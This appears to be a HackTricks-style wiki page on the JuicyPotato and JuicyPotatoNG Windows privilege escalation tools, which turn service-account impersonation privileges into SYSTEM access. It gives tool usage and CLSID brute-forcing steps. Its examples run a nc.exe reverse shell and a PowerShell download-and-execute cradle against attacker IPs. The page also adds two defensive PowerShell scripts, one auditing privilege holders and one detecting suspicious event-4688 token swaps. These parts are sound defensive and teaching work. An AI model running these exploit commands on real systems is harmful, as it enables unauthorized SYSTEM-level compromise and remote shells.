JuicyPotato

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

[!WARNING] JuicyPotato is legacy. It generally works up to Windows 10 1803 / Windows Server 2016. The changes Microsoft introduced in Windows 10 1809 / Server 2019 broke the original technique. For those builds and later, consider modern alternatives such as PrintSpoofer, RoguePotato, SharpEfsPotato/EfsPotato and GodPotato. See the page below for up-to-date options and usage.

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Juicy Potato (abusing the golden privileges)

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from Windows Service Accounts to NT AUTHORITY\SYSTEM

You can download juicypotato from https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Compatibility quick notes

  • Works reliably up to Windows 10 1803 and Windows Server 2016 when the current context has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.
  • Broken by Microsoft hardening from Windows 10 1809 / Windows Server 2019 onward. Prefer the alternatives linked above for those builds.

Summary

From juicy-potato Readme:

RottenPotatoNG and its variants leverage the privilege escalation chain based on the BITS service having the MiTM listener on 127.0.0.1:6666 when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

We decided to weaponize [RottenPotatoNG]: Say hello to Juicy Potato.

For the theory, see Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM and follow the chain of links and references.

We discovered that, other than BITS, there are several COM servers we can abuse. They just need to:

  1. be instantiable by the current user (normally a "service user", which has impersonation privileges)
  2. implement the IMarshal interface
  3. run as an elevated user (SYSTEM, Administrator, ...)

After some testing we obtained and tested an extensive list of interesting CLSIDs on several Windows versions.

Juicy details

JuicyPotato allows you to:

  • Target CLSID: pick any CLSID you want. Here you can find the list organized by OS.
  • COM Listening port: define the COM listening port you prefer (instead of the marshalled hard-coded 6666).
  • COM Listening IP address: bind the server on any IP.
  • Process creation mode: depending on the impersonated user's privileges you can choose from:
      • CreateProcessWithToken (needs SeImpersonate)
      • CreateProcessAsUser (needs SeAssignPrimaryToken)
      • both
  • Process to launch: the executable or script to launch if the exploitation succeeds.
  • Process Argument: customize the arguments of the launched process.
  • RPC Server address: for a stealthy approach you can authenticate to an external RPC server.
  • RPC Server port: useful if you want to authenticate to an external server and a firewall is blocking port 135...
  • TEST mode: mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM object and prints the user of the token. See here for testing.

Usage

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Final thoughts

From juicy-potato Readme:

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

It's nearly impossible to prevent the abuse of all these COM Servers. You could think of modifying the permissions of these objects via DCOMCNFG, but good luck, this is going to be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.

From: http://ohpe.it/juicy-potato/
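To act on that advice a defender first has to know which principals hold the two privileges on a given host and which running services carry them. The PowerShell below is an added example written for this page; it is not code from the JuicyPotato project or its readme, and the function names Get-PrivilegeHolders and Get-ExposedServices are my own. It exports the local User Rights Assignment with secedit, resolves the SIDs granted SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, and lists the running services whose logon identity falls in that set. Run it from an elevated prompt.

```powershell
# Added example for this page (not JuicyPotato project code): audit who holds the two
# privileges that make the technique possible and which running services carry them.
# Run elevated; secedit needs administrative rights to export the local policy.
$GoldenPrivileges = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

function Get-PrivilegeHolders {
    param([string[]]$PrivilegeNames = $GoldenPrivileges)

    $cfg = Join-Path $env:TEMP ('rights-{0}.inf' -f [guid]::NewGuid())
    try {
        # Export only the User Rights Assignment area of the effective local policy.
        $null = & secedit.exe /export /cfg $cfg /areas USER_RIGHTS /quiet
        if (-not (Test-Path $cfg)) { throw 'secedit export failed (not elevated?)' }

        foreach ($line in Get-Content -Path $cfg) {
            # Entries look like: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
            if ($line -notmatch '^\s*(Se\w+Privilege)\s*=\s*(.*)$') { continue }
            $name = $Matches[1]
            if ($PrivilegeNames -notcontains $name) { continue }

            foreach ($entry in ($Matches[2] -split ',')) {
                $sid = $entry.Trim().TrimStart('*')
                if (-not $sid) { continue }
                $account = $sid
                try {
                    # Resolve well-known and local SIDs to names; unresolvable ones stay as SIDs.
                    $account = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                                   [System.Security.Principal.NTAccount]).Value
                } catch { }
                [pscustomobject]@{ Privilege = $name; Sid = $sid; Account = $account }
            }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }
}

function Get-ExposedServices {
    # Running services whose logon identity holds one of the privileges. A code-execution
    # bug in any of these is what the technique turns into SYSTEM.
    $holders = Get-PrivilegeHolders | Select-Object -ExpandProperty Account -Unique
    # Every service logon token is a member of NT AUTHORITY\SERVICE (S-1-5-6), so if that
    # group is a holder (it is by default), all non-LocalSystem services are exposed.
    $viaServiceGroup = $holders -contains 'NT AUTHORITY\SERVICE'

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.State -eq 'Running' -and $_.StartName -and $_.StartName -ne 'LocalSystem' } |
        ForEach-Object {
            # CIM spells the built-in accounts differently from SID resolution; normalise.
            $acct = $_.StartName -replace '\\LocalService$', '\LOCAL SERVICE' -replace '\\NetworkService$', '\NETWORK SERVICE'
            $reason = if ($holders -contains $acct) { 'account holds privilege' }
                      elseif ($viaServiceGroup) { 'member of SERVICE group' }
            if ($reason) {
                [pscustomobject]@{ Service = $_.Name; Account = $acct; Reason = $reason; Binary = $_.PathName }
            }
        }
}

Get-PrivilegeHolders | Format-Table -AutoSize
Get-ExposedServices  | Format-Table -AutoSize
```

On a default installation the first table shows Administrators, LOCAL SERVICE, NETWORK SERVICE and SERVICE holding SeImpersonatePrivilege, which is why the readme calls prevention nearly impossible: the second table then lists every running service that is not LocalSystem. The useful output is the list of those services that also expose network-reachable or user-reachable code, since that is where the page's "protect the applications running under the * SERVICE accounts" applies. For the privileges of the context you are currently in, whoami /priv gives the same answer for one token.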

JuicyPotatoNG (2022+)

JuicyPotatoNG re-introduced a JuicyPotato-style local privilege escalation on modern Windows by combining:

  • DCOM OXID resolution to a local RPC server on a chosen port, avoiding the need for the previously hard-coded 127.0.0.1:6666 listener.
  • An SSPI hook to capture and impersonate the incoming SYSTEM authentication without requiring RpcImpersonateClient. This also enables CreateProcessAsUser when only SeAssignPrimaryTokenPrivilege is present.
  • Tricks to satisfy DCOM activation constraints (e.g. the previous INTERACTIVE-group requirement when targeting the PrintNotify / ActiveX Installer Service classes).

Important notes (behavior changes by build):

  • September 2022: the initial technique worked on supported Windows 10/11 and Server targets using the "INTERACTIVE trick".
  • January 2023 update from the authors: Microsoft later blocked the INTERACTIVE trick. A different CLSID ({A9819296-E5B3-4E67-8226-5E72CE9E1FB7}) restores the exploit but, according to the post, only on Windows 11 / Server 2022.

Basic usage (more flags in the help):

JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
# Useful helpers:
#  -b  Bruteforce all CLSIDs (testing only; spawns many processes)
#  -s  Scan for a COM port not filtered by Windows Defender Firewall
#  -i  Interactive console (only with CreateProcessAsUser)

If classic JuicyPotato is patched on Windows 10 1809 / Server 2019, prefer the alternatives linked at the top (RoguePotato, PrintSpoofer, EfsPotato/GodPotato, etc.). NG may be situational depending on the build and on service state.

Examples

Note: visit this page for a list of CLSIDs to try.

Get a nc.exe reverse shell

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>
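The run above ends in CreateProcessWithTokenW OK: the host-side trace of that is a new process whose creator account is not the account it runs as. Windows records both sides in Security event 4688 (Creator Subject and Target Subject) once Audit Process Creation is enabled. The PowerShell below is an added example written for this page, not project code: Find-TokenSwapProcessCreation (my name) parses 4688 event XML and reports records where a non-SYSTEM creator produced a SYSTEM process. The two event records are constructed, not captured logs, and which of the two subjects carries the service account can vary with the creation path (CreateProcessAsUser directly from the calling process versus CreateProcessWithTokenW, which goes through the Secondary Logon service), so baseline the rule against your own telemetry before alerting on it.

```powershell
# Added example for this page (not JuicyPotato project code): flag Security 4688
# records where the account that created a process differs from the account the
# process runs as, and the new process runs as SYSTEM. Field names follow the 4688
# schema; the Target* fields exist on Windows 10 / Server 2016 and later.
$SystemSid = 'S-1-5-18'

function Find-TokenSwapProcessCreation {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$EventXml   # one event as XML, e.g. from Get-WinEvent ... | % { $_.ToXml() }
    )
    process {
        [xml]$doc = $EventXml
        if ($doc.Event.System.EventID -ne '4688') { return }

        # EventData is a flat list of <Data Name="...">value</Data>; fold it into a table.
        $d = @{}
        foreach ($item in $doc.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }

        $creator = $d['SubjectUserSid']
        $target  = $d['TargetUserSid']
        # With no token switch the Target fields hold the NULL SID / '-': nothing to report.
        if (-not $target -or ($target -in @('S-1-0-0', '-')) -or $target -eq $creator) { return }

        if ($target -eq $SystemSid -and $creator -ne $SystemSid) {
            [pscustomobject]@{
                Time        = $doc.Event.System.TimeCreated.SystemTime
                Creator     = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
                RunsAs      = '{0}\{1}' -f $d['TargetDomainName'], $d['TargetUserName']
                NewProcess  = $d['NewProcessName']
                Parent      = $d['ParentProcessName']
                CommandLine = $d['CommandLine']
            }
        }
    }
}

# Constructed sample records (not captured logs). The first mimics a NETWORK SERVICE
# context producing a cmd.exe that runs as SYSTEM; the second is the routine case of the
# SYSTEM service controller starting a service as NETWORK SERVICE, which must not fire.
$SuspectEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4688</EventID><TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/></System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-20</Data>
    <Data Name="SubjectUserName">NETWORK SERVICE</Data>
    <Data Name="SubjectDomainName">NT AUTHORITY</Data>
    <Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
    <Data Name="CommandLine">cmd.exe /c whoami</Data>
    <Data Name="TargetUserSid">S-1-5-18</Data>
    <Data Name="TargetUserName">SYSTEM</Data>
    <Data Name="TargetDomainName">NT AUTHORITY</Data>
    <Data Name="ParentProcessName">C:\Users\Public\tool.exe</Data>
  </EventData>
</Event>
'@
$RoutineEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4688</EventID><TimeCreated SystemTime="2024-01-01T10:00:01.000Z"/></System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">SYSTEM</Data>
    <Data Name="SubjectDomainName">NT AUTHORITY</Data>
    <Data Name="NewProcessName">C:\Windows\System32\svchost.exe</Data>
    <Data Name="TargetUserSid">S-1-5-20</Data>
    <Data Name="TargetUserName">NETWORK SERVICE</Data>
    <Data Name="TargetDomainName">NT AUTHORITY</Data>
    <Data Name="ParentProcessName">C:\Windows\System32\services.exe</Data>
  </EventData>
</Event>
'@

# Offline check: only the first record is reported.
@($SuspectEvent, $RoutineEvent) | Find-TokenSwapProcessCreation | Format-List

# Live use against the local Security log (elevated):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 5000 |
#     ForEach-Object { $_.ToXml() } | Find-TokenSwapProcessCreation
```

The rule deliberately ignores the common legitimate direction (SYSTEM creating a process as a less privileged account, which services.exe and scheduled tasks do constantly) and only reports the climb from a non-SYSTEM creator to a SYSTEM process. Enable command-line logging in the process creation audit policy if you want the CommandLine column populated; without it the field is absent and the object shows it empty.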

PowerShell reverse shell

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Launch a new CMD (if you have RDP access)

CLSID Problems

Often the default CLSID that JuicyPotato uses does not work and the exploit fails. Usually it takes multiple attempts to find a working CLSID. To get a list of CLSIDs to try for a specific operating system, visit this page:

Checking CLSIDs

First, you will need some executables apart from juicypotato.exe.

Download Join-Object.ps1 and load it into your PS session, then download and execute GetCLSID.ps1. That script will create a list of possible CLSIDs to test.

Then download test_clsid.bat (change the path to the CLSID list and to the juicypotato executable) and execute it. It will start trying every CLSID in turn, and when the port number changes it means that the CLSID worked.

Check the working CLSIDs using the -c parameter.
